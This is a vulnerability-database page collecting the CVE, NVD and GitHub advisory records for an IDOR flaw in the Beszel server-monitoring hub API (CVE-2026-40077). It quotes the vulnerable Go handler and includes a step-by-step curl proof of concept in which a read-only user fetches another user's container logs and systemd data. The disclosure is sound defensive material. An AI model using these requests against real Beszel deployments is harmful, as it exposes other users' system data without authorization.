Vulnerability-Lookup

CVE-2026-40077 (GCVE-0-2026-40077)

Vulnerability from cvelistv5 – Published: 2026-04-09 19:27 – Updated: 2026-04-13 20:19

Title

Beszel has an IDOR in hub API endpoints that read system ID from URL parameter

Summary

Beszel is a server monitoring platform. Prior to 0.18.7, some API endpoints in the Beszel hub accept a user-supplied system ID and proceed without further checks that the user should have access to that system. As a result, any authenticated user can access these routes for any system if they know the system's ID. System IDs are random 15 character alphanumeric strings, and are not exposed to all users. However, it is theoretically possible for an authenticated user to enumerate a valid system ID via web API. To use the containers endpoints, the user would also need to enumerate a container ID, which is 12 digit hexadecimal string. This vulnerability is fixed in 0.18.7.

Severity ?

3.5 (Low)


                        
                          CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N

CWE

CWE-184 - Incomplete List of Disallowed Inputs

Assigner

GitHub_M

References

URL

Tags

	https://github.com/henrygd/beszel/security/adviso…	x_refsource_CONFIRM
	https://github.com/henrygd/beszel/releases/tag/v0.18.7	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	henrygd	beszel	Affected: < 0.18.7

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-40077",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-13T20:19:31.722610Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-13T20:19:45.967Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "beszel",
          "vendor": "henrygd",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.18.7"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Beszel is a server monitoring platform. Prior to 0.18.7, some API endpoints in the Beszel hub accept a user-supplied system ID and proceed without further checks that the user should have access to that system. As a result, any authenticated user can access these routes for any system if they know the system\u0027s ID. System IDs are random 15 character alphanumeric strings, and are not exposed to all users. However, it is theoretically possible for an authenticated user to enumerate a valid system ID via web API. To use the containers endpoints, the user would also need to enumerate a container ID, which is 12 digit hexadecimal string. This vulnerability is fixed in 0.18.7."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-184",
              "description": "CWE-184: Incomplete List of Disallowed Inputs",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-09T19:27:39.364Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/henrygd/beszel/security/advisories/GHSA-5f5r-95pg-xrpm",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/henrygd/beszel/security/advisories/GHSA-5f5r-95pg-xrpm"
        },
        {
          "name": "https://github.com/henrygd/beszel/releases/tag/v0.18.7",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/henrygd/beszel/releases/tag/v0.18.7"
        }
      ],
      "source": {
        "advisory": "GHSA-5f5r-95pg-xrpm",
        "discovery": "UNKNOWN"
      },
      "title": "Beszel has an IDOR in hub API endpoints that read system ID from URL parameter"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40077",
    "datePublished": "2026-04-09T19:27:39.364Z",
    "dateReserved": "2026-04-09T00:39:12.205Z",
    "dateUpdated": "2026-04-13T20:19:45.967Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-40077",
      "date": "2026-04-14",
      "epss": "0.00048",
      "percentile": "0.14654"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40077\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-09T20:16:27.230\",\"lastModified\":\"2026-04-13T15:02:27.760\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Beszel is a server monitoring platform. Prior to 0.18.7, some API endpoints in the Beszel hub accept a user-supplied system ID and proceed without further checks that the user should have access to that system. As a result, any authenticated user can access these routes for any system if they know the system\u0027s ID. System IDs are random 15 character alphanumeric strings, and are not exposed to all users. However, it is theoretically possible for an authenticated user to enumerate a valid system ID via web API. To use the containers endpoints, the user would also need to enumerate a container ID, which is 12 digit hexadecimal string. This vulnerability is fixed in 0.18.7.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N\",\"baseScore\":3.5,\"baseSeverity\":\"LOW\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.8,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-184\"}]}],\"references\":[{\"url\":\"https://github.com/henrygd/beszel/releases/tag/v0.18.7\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/henrygd/beszel/security/advisories/GHSA-5f5r-95pg-xrpm\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-40077\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-13T20:19:31.722610Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-13T20:19:41.922Z\"}}], \"cna\": {\"title\": \"Beszel has an IDOR in hub API endpoints that read system ID from URL parameter\", \"source\": {\"advisory\": \"GHSA-5f5r-95pg-xrpm\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 3.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"LOW\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"henrygd\", \"product\": \"beszel\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.18.7\"}]}], \"references\": [{\"url\": \"https://github.com/henrygd/beszel/security/advisories/GHSA-5f5r-95pg-xrpm\", \"name\": \"https://github.com/henrygd/beszel/security/advisories/GHSA-5f5r-95pg-xrpm\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/henrygd/beszel/releases/tag/v0.18.7\", \"name\": \"https://github.com/henrygd/beszel/releases/tag/v0.18.7\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Beszel is a server monitoring platform. Prior to 0.18.7, some API endpoints in the Beszel hub accept a user-supplied system ID and proceed without further checks that the user should have access to that system. As a result, any authenticated user can access these routes for any system if they know the system\u0027s ID. System IDs are random 15 character alphanumeric strings, and are not exposed to all users. However, it is theoretically possible for an authenticated user to enumerate a valid system ID via web API. To use the containers endpoints, the user would also need to enumerate a container ID, which is 12 digit hexadecimal string. This vulnerability is fixed in 0.18.7.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-184\", \"description\": \"CWE-184: Incomplete List of Disallowed Inputs\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-09T19:27:39.364Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-40077\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-13T20:19:45.967Z\", \"dateReserved\": \"2026-04-09T00:39:12.205Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-09T19:27:39.364Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-40077

Vulnerability from fkie_nvd - Published: 2026-04-09 20:16 - Updated: 2026-04-13 15:02

Severity ?

3.5 (Low) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/henrygd/beszel/releases/tag/v0.18.7
	security-advisories@github.com	https://github.com/henrygd/beszel/security/advisories/GHSA-5f5r-95pg-xrpm

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Beszel is a server monitoring platform. Prior to 0.18.7, some API endpoints in the Beszel hub accept a user-supplied system ID and proceed without further checks that the user should have access to that system. As a result, any authenticated user can access these routes for any system if they know the system\u0027s ID. System IDs are random 15 character alphanumeric strings, and are not exposed to all users. However, it is theoretically possible for an authenticated user to enumerate a valid system ID via web API. To use the containers endpoints, the user would also need to enumerate a container ID, which is 12 digit hexadecimal string. This vulnerability is fixed in 0.18.7."
    }
  ],
  "id": "CVE-2026-40077",
  "lastModified": "2026-04-13T15:02:27.760",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 3.5,
          "baseSeverity": "LOW",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-09T20:16:27.230",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/henrygd/beszel/releases/tag/v0.18.7"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/henrygd/beszel/security/advisories/GHSA-5f5r-95pg-xrpm"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-184"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-5F5R-95PG-XRPM

Vulnerability from github – Published: 2026-04-10 17:32 – Updated: 2026-04-10 17:32

Summary

Beszel has an IDOR in hub API endpoints that read system ID from URL parameter

Details

Summary

Some API endpoints in the Beszel hub accept a user-supplied system ID and proceed without further checks that the user should have access to that system. As a result, any authenticated user can access these routes for any system if they know the system's ID.

System IDs are random 15 character alphanumeric strings, and are not exposed to all users. However, it is theoretically possible for an authenticated user to enumerate a valid system ID via web API. To use the containers endpoints, the user would also need to enumerate a container ID, which is 12 digit hexadecimal string.

Affected Component

File: internal/hub/api.go, lines 283–361
Endpoints:
GET /api/beszel/containers/logs?system=SYSTEM_ID&container=CONTAINER_ID
GET /api/beszel/containers/info?system=SYSTEM_ID&container=CONTAINER_ID
GET /api/beszel/systemd/info?system=SYSTEM_ID&service=SERVICE_NAME
POST /api/beszel/smart/refresh?system=SYSTEM_ID
Commit: c7261b56f1bfb9ae57ef0856a0052cabb2fd3b84

Vulnerable Code

The containerRequestHandler function retrieves a system by ID but never verifies the authenticated user is a member of that system:

// internal/hub/api.go:283-305
func (h *Hub) containerRequestHandler(e *core.RequestEvent, fetchFunc func(*systems.System, string) (string, error), responseKey string) error {
    systemID := e.Request.URL.Query().Get("system")
    containerID := e.Request.URL.Query().Get("container")

    if systemID == "" || containerID == "" {
        return e.JSON(http.StatusBadRequest, map[string]string{"error": "system and container parameters are required"})
    }
    if !containerIDPattern.MatchString(containerID) {
        return e.JSON(http.StatusBadRequest, map[string]string{"error": "invalid container parameter"})
    }

    system, err := h.sm.GetSystem(systemID)
    // ^^^ No authorization check: e.Auth.Id is never verified against system.users
    if err != nil {
        return e.JSON(http.StatusNotFound, map[string]string{"error": "system not found"})
    }

    data, err := fetchFunc(system, containerID)
    if err != nil {
        return e.JSON(http.StatusNotFound, map[string]string{"error": err.Error()})
    }

    return e.JSON(http.StatusOK, map[string]string{responseKey: data})
}

The same pattern applies to getSystemdInfo (lines 322–340) and refreshSmartData (lines 342–361).

Meanwhile, the standard PocketBase collection API enforces proper membership checks:

// internal/hub/collections.go:56-57
systemsMemberRule := authenticatedRule + " && users.id ?= @request.auth.id"
systemMemberRule  := authenticatedRule + " && system.users.id ?= @request.auth.id"

These rules are only applied to the PocketBase collection endpoints, not to the custom routes registered on apiAuth.

PoC

The proof: The standard PocketBase API returns 404 (system not found) for unassigned systems. The custom endpoints resolve the system, contact the agent, and return data — proving the authorization check is missing.

Step 1: Start the hub

cd ~/Evidence/henrygd/beszel/finding418/docker-poc/
docker compose up -d

Wait a few seconds, then verify:

curl -s http://localhost:8090/api/health

Expected: {"message":"API is healthy.","code":200,"data":{}}

Step 2: Create User A (admin)

Open http://localhost:8090 in a browser and create the first user:

Email: usera@test.com
Password: testpassword1

Step 3: Create User B (readonly)

In the Beszel UI, go to Users and add a new user:

Email: userb@test.com
Password: testpassword2
Role: readonly

Step 4: Authenticate as User A

TOKEN_A=$(curl -s http://localhost:8090/api/collections/users/auth-with-password \
  -H "Content-Type: application/json" \
  -d '{"identity":"usera@test.com","password":"testpassword1"}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")

echo "TOKEN_A=$TOKEN_A"

Step 5: Get hub public key

HUB_KEY=$(curl -s http://localhost:8090/api/beszel/getkey \
  -H "Authorization: $TOKEN_A" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['key'])")

echo "HUB_KEY=$HUB_KEY"

Step 6: Create a universal token and start the agent

UTOK_A=$(curl -s "http://localhost:8090/api/beszel/universal-token?enable=1" \
  -H "Authorization: $TOKEN_A" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")

echo "UTOK_A=$UTOK_A"

Find the Docker network the hub is on:

NETWORK=$(docker inspect beszel-hub --format '{{range $k,$v := .NetworkSettings.Networks}}{{$k}}{{end}}')
echo "Network: $NETWORK"

Start the agent on the same network so the hub can reach it:

docker run -d --name beszel-agent-a \
  --network "$NETWORK" \
  -e HUB_URL=http://beszel-hub:8090 \
  -e TOKEN="$UTOK_A" \
  -e KEY="$HUB_KEY" \
  henrygd/beszel-agent:latest

Wait a few seconds for the agent to register:

sleep 5

Step 7: Verify User A sees the system

curl -s http://localhost:8090/api/collections/systems/records \
  -H "Authorization: $TOKEN_A" | python3 -m json.tool

You should see one system in items. Save the system ID:

SYSTEM_A_ID=$(curl -s http://localhost:8090/api/collections/systems/records \
  -H "Authorization: $TOKEN_A" \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['items'][0]['id'])")

echo "SYSTEM_A_ID=$SYSTEM_A_ID"

Step 8: Authenticate as User B (readonly)

TOKEN_B=$(curl -s http://localhost:8090/api/collections/users/auth-with-password \
  -H "Content-Type: application/json" \
  -d '{"identity":"userb@test.com","password":"testpassword2"}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")

echo "TOKEN_B=$TOKEN_B"

Verify User B sees NO systems:

curl -s http://localhost:8090/api/collections/systems/records \
  -H "Authorization: $TOKEN_B" | python3 -m json.tool

Expected: "totalItems": 0

Step 9: Control test — standard API blocks User B

echo "=== Standard PocketBase API ==="
curl -s -w "\nHTTP Status: %{http_code}\n" \
  "http://localhost:8090/api/collections/systems/records/$SYSTEM_A_ID" \
  -H "Authorization: $TOKEN_B"

Expected: 404 — RBAC correctly hides the system from User B.

Step 10: IDOR — SMART refresh (User B triggers action on User A's system)

echo "=== IDOR: POST /api/beszel/smart/refresh ==="
curl -s "http://localhost:8090/api/beszel/smart/refresh?system=$SYSTEM_A_ID" \
  -X POST -H "Authorization: $TOKEN_B" | python3 -m json.tool

Expected: The hub processes the request and contacts the agent. Any response (data or agent error) proves the IDOR — compare with the 404 from Step 9.

Step 11: IDOR — Systemd info (User B reads from User A's system)

echo "=== IDOR: GET /api/beszel/systemd/info ==="
curl -s "http://localhost:8090/api/beszel/systemd/info?system=$SYSTEM_A_ID&service=sshd" \
  -H "Authorization: $TOKEN_B" | python3 -m json.tool

Expected: Hub contacts the agent and returns systemd data or an agent-level error.

Step 12: IDOR — Container logs (User B reads from User A's system)

Container endpoints require a Docker container ID (12-64 hex chars). Get a real one from the agent's host:

# Get a real container ID from Docker (first 12 hex chars)
CONTAINER_ID=$(docker ps --format '{{.ID}}' | head -1)
echo "CONTAINER_ID=$CONTAINER_ID"

echo "=== IDOR: GET /api/beszel/containers/logs ==="
curl -s "http://localhost:8090/api/beszel/containers/logs?system=$SYSTEM_A_ID&container=$CONTAINER_ID" \
  -H "Authorization: $TOKEN_B" | python3 -m json.tool

Step 13: IDOR — Container info (User B reads from User A's system)

echo "=== IDOR: GET /api/beszel/containers/info ==="
curl -s "http://localhost:8090/api/beszel/containers/info?system=$SYSTEM_A_ID&container=$CONTAINER_ID" \
  -H "Authorization: $TOKEN_B" | python3 -m json.tool

Impact

Container logs: Content of recent application logs, potentially including sensitive information
Container info: Content of Docker engine API's /containers/{id}/json endpoint, excluding environment variables
Systemd info: Unit properties and status for any monitored service
SMART refresh: Trigger a SMART data update on any system

Severity ?

3.5 (Low)


                  
                    CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.18.6"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/henrygd/beszel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.18.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40077"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T17:32:05Z",
    "nvd_published_at": "2026-04-09T20:16:27Z",
    "severity": "LOW"
  },
  "details": "## Summary\nSome API endpoints in the Beszel hub accept a user-supplied system ID and proceed without further checks that the user should have access to that system. As a result, any authenticated user can access these routes for any system if they know the system\u0027s ID.\n\nSystem IDs are random 15 character alphanumeric strings, and are not exposed to all users. However, it is theoretically possible for an authenticated user to enumerate a valid system ID via web API. To use the `containers` endpoints, the user would also need to enumerate a container ID, which is 12 digit hexadecimal string.\n\n## Affected Component\n\n- **File:** `internal/hub/api.go`, lines 283\u2013361\n- **Endpoints:**\n  - `GET /api/beszel/containers/logs?system=SYSTEM_ID\u0026container=CONTAINER_ID`\n  - `GET /api/beszel/containers/info?system=SYSTEM_ID\u0026container=CONTAINER_ID`\n  - `GET /api/beszel/systemd/info?system=SYSTEM_ID\u0026service=SERVICE_NAME`\n  - `POST /api/beszel/smart/refresh?system=SYSTEM_ID`\n- **Commit:** c7261b56f1bfb9ae57ef0856a0052cabb2fd3b84\n\n## Vulnerable Code\n\nThe `containerRequestHandler` function retrieves a system by ID but never verifies the authenticated user is a member of that system:\n\n```go\n// internal/hub/api.go:283-305\nfunc (h *Hub) containerRequestHandler(e *core.RequestEvent, fetchFunc func(*systems.System, string) (string, error), responseKey string) error {\n    systemID := e.Request.URL.Query().Get(\"system\")\n    containerID := e.Request.URL.Query().Get(\"container\")\n\n    if systemID == \"\" || containerID == \"\" {\n        return e.JSON(http.StatusBadRequest, map[string]string{\"error\": \"system and container parameters are required\"})\n    }\n    if !containerIDPattern.MatchString(containerID) {\n        return e.JSON(http.StatusBadRequest, map[string]string{\"error\": \"invalid container parameter\"})\n    }\n\n    system, err := h.sm.GetSystem(systemID)\n    // ^^^ No authorization check: e.Auth.Id is never verified against system.users\n    if err != nil {\n        return e.JSON(http.StatusNotFound, map[string]string{\"error\": \"system not found\"})\n    }\n\n    data, err := fetchFunc(system, containerID)\n    if err != nil {\n        return e.JSON(http.StatusNotFound, map[string]string{\"error\": err.Error()})\n    }\n\n    return e.JSON(http.StatusOK, map[string]string{responseKey: data})\n}\n```\n\nThe same pattern applies to `getSystemdInfo` (lines 322\u2013340) and `refreshSmartData` (lines 342\u2013361).\n\nMeanwhile, the standard PocketBase collection API enforces proper membership checks:\n\n```go\n// internal/hub/collections.go:56-57\nsystemsMemberRule := authenticatedRule + \" \u0026\u0026 users.id ?= @request.auth.id\"\nsystemMemberRule  := authenticatedRule + \" \u0026\u0026 system.users.id ?= @request.auth.id\"\n```\n\nThese rules are only applied to the PocketBase collection endpoints, **not** to the custom routes registered on `apiAuth`.\n\n### PoC\n**The proof:** The standard PocketBase API returns `404` (system not found) for unassigned systems. The custom endpoints resolve the system, contact the agent, and return data \u2014 proving the authorization check is missing.\n\n#### Step 1: Start the hub\n\n```bash\ncd ~/Evidence/henrygd/beszel/finding418/docker-poc/\ndocker compose up -d\n```\n\nWait a few seconds, then verify:\n\n```bash\ncurl -s http://localhost:8090/api/health\n```\n\nExpected: `{\"message\":\"API is healthy.\",\"code\":200,\"data\":{}}`\n\n#### Step 2: Create User A (admin)\n\nOpen `http://localhost:8090` in a browser and create the first user:\n\n- Email: `usera@test.com`\n- Password: `testpassword1`\n\n#### Step 3: Create User B (readonly)\n\nIn the Beszel UI, go to Users and add a new user:\n\n- Email: `userb@test.com`\n- Password: `testpassword2`\n- Role: **readonly**\n\n#### Step 4: Authenticate as User A\n\n```bash\nTOKEN_A=$(curl -s http://localhost:8090/api/collections/users/auth-with-password \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"identity\":\"usera@test.com\",\"password\":\"testpassword1\"}\u0027 \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027token\u0027])\")\n\necho \"TOKEN_A=$TOKEN_A\"\n```\n\n#### Step 5: Get hub public key\n\n```bash\nHUB_KEY=$(curl -s http://localhost:8090/api/beszel/getkey \\\n  -H \"Authorization: $TOKEN_A\" \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027key\u0027])\")\n\necho \"HUB_KEY=$HUB_KEY\"\n```\n\n#### Step 6: Create a universal token and start the agent\n\n```bash\nUTOK_A=$(curl -s \"http://localhost:8090/api/beszel/universal-token?enable=1\" \\\n  -H \"Authorization: $TOKEN_A\" \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027token\u0027])\")\n\necho \"UTOK_A=$UTOK_A\"\n```\n\nFind the Docker network the hub is on:\n\n```bash\nNETWORK=$(docker inspect beszel-hub --format \u0027{{range $k,$v := .NetworkSettings.Networks}}{{$k}}{{end}}\u0027)\necho \"Network: $NETWORK\"\n```\n\nStart the agent on the **same network** so the hub can reach it:\n\n```bash\ndocker run -d --name beszel-agent-a \\\n  --network \"$NETWORK\" \\\n  -e HUB_URL=http://beszel-hub:8090 \\\n  -e TOKEN=\"$UTOK_A\" \\\n  -e KEY=\"$HUB_KEY\" \\\n  henrygd/beszel-agent:latest\n```\n\nWait a few seconds for the agent to register:\n\n```bash\nsleep 5\n```\n\n#### Step 7: Verify User A sees the system\n\n```bash\ncurl -s http://localhost:8090/api/collections/systems/records \\\n  -H \"Authorization: $TOKEN_A\" | python3 -m json.tool\n```\n\nYou should see one system in `items`. Save the system ID:\n\n```bash\nSYSTEM_A_ID=$(curl -s http://localhost:8090/api/collections/systems/records \\\n  -H \"Authorization: $TOKEN_A\" \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027items\u0027][0][\u0027id\u0027])\")\n\necho \"SYSTEM_A_ID=$SYSTEM_A_ID\"\n```\n\n#### Step 8: Authenticate as User B (readonly)\n\n```bash\nTOKEN_B=$(curl -s http://localhost:8090/api/collections/users/auth-with-password \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"identity\":\"userb@test.com\",\"password\":\"testpassword2\"}\u0027 \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027token\u0027])\")\n\necho \"TOKEN_B=$TOKEN_B\"\n```\n\nVerify User B sees NO systems:\n\n```bash\ncurl -s http://localhost:8090/api/collections/systems/records \\\n  -H \"Authorization: $TOKEN_B\" | python3 -m json.tool\n```\n\nExpected: `\"totalItems\": 0`\n\n#### Step 9: Control test \u2014 standard API blocks User B\n\n```bash\necho \"=== Standard PocketBase API ===\"\ncurl -s -w \"\\nHTTP Status: %{http_code}\\n\" \\\n  \"http://localhost:8090/api/collections/systems/records/$SYSTEM_A_ID\" \\\n  -H \"Authorization: $TOKEN_B\"\n```\n\nExpected: **404** \u2014 RBAC correctly hides the system from User B.\n\n#### Step 10: IDOR \u2014 SMART refresh (User B triggers action on User A\u0027s system)\n\n```bash\necho \"=== IDOR: POST /api/beszel/smart/refresh ===\"\ncurl -s \"http://localhost:8090/api/beszel/smart/refresh?system=$SYSTEM_A_ID\" \\\n  -X POST -H \"Authorization: $TOKEN_B\" | python3 -m json.tool\n```\n\nExpected: The hub processes the request and contacts the agent. Any response (data or agent error) proves the IDOR \u2014 compare with the 404 from Step 9.\n\n#### Step 11: IDOR \u2014 Systemd info (User B reads from User A\u0027s system)\n\n```bash\necho \"=== IDOR: GET /api/beszel/systemd/info ===\"\ncurl -s \"http://localhost:8090/api/beszel/systemd/info?system=$SYSTEM_A_ID\u0026service=sshd\" \\\n  -H \"Authorization: $TOKEN_B\" | python3 -m json.tool\n```\n\nExpected: Hub contacts the agent and returns systemd data or an agent-level error.\n\n#### Step 12: IDOR \u2014 Container logs (User B reads from User A\u0027s system)\n\nContainer endpoints require a Docker container ID (12-64 hex chars). Get a real one from the agent\u0027s host:\n\n```bash\n# Get a real container ID from Docker (first 12 hex chars)\nCONTAINER_ID=$(docker ps --format \u0027{{.ID}}\u0027 | head -1)\necho \"CONTAINER_ID=$CONTAINER_ID\"\n\necho \"=== IDOR: GET /api/beszel/containers/logs ===\"\ncurl -s \"http://localhost:8090/api/beszel/containers/logs?system=$SYSTEM_A_ID\u0026container=$CONTAINER_ID\" \\\n  -H \"Authorization: $TOKEN_B\" | python3 -m json.tool\n```\n\n#### Step 13: IDOR \u2014 Container info (User B reads from User A\u0027s system)\n\n```bash\necho \"=== IDOR: GET /api/beszel/containers/info ===\"\ncurl -s \"http://localhost:8090/api/beszel/containers/info?system=$SYSTEM_A_ID\u0026container=$CONTAINER_ID\" \\\n  -H \"Authorization: $TOKEN_B\" | python3 -m json.tool\n```\n\n### Impact\n\n- **Container logs**: Content of recent application logs, potentially including sensitive information\n- **Container info**: Content of Docker engine API\u0027s `/containers/{id}/json` endpoint, excluding environment variables\n- **Systemd info**: Unit properties and status for any monitored service\n- **SMART refresh**: Trigger a SMART data update on any system",
  "id": "GHSA-5f5r-95pg-xrpm",
  "modified": "2026-04-10T17:32:05Z",
  "published": "2026-04-10T17:32:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/henrygd/beszel/security/advisories/GHSA-5f5r-95pg-xrpm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40077"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/henrygd/beszel"
    },
    {
      "type": "WEB",
      "url": "https://github.com/henrygd/beszel/releases/tag/v0.18.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Beszel has an IDOR in hub API endpoints that read system ID from URL parameter"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

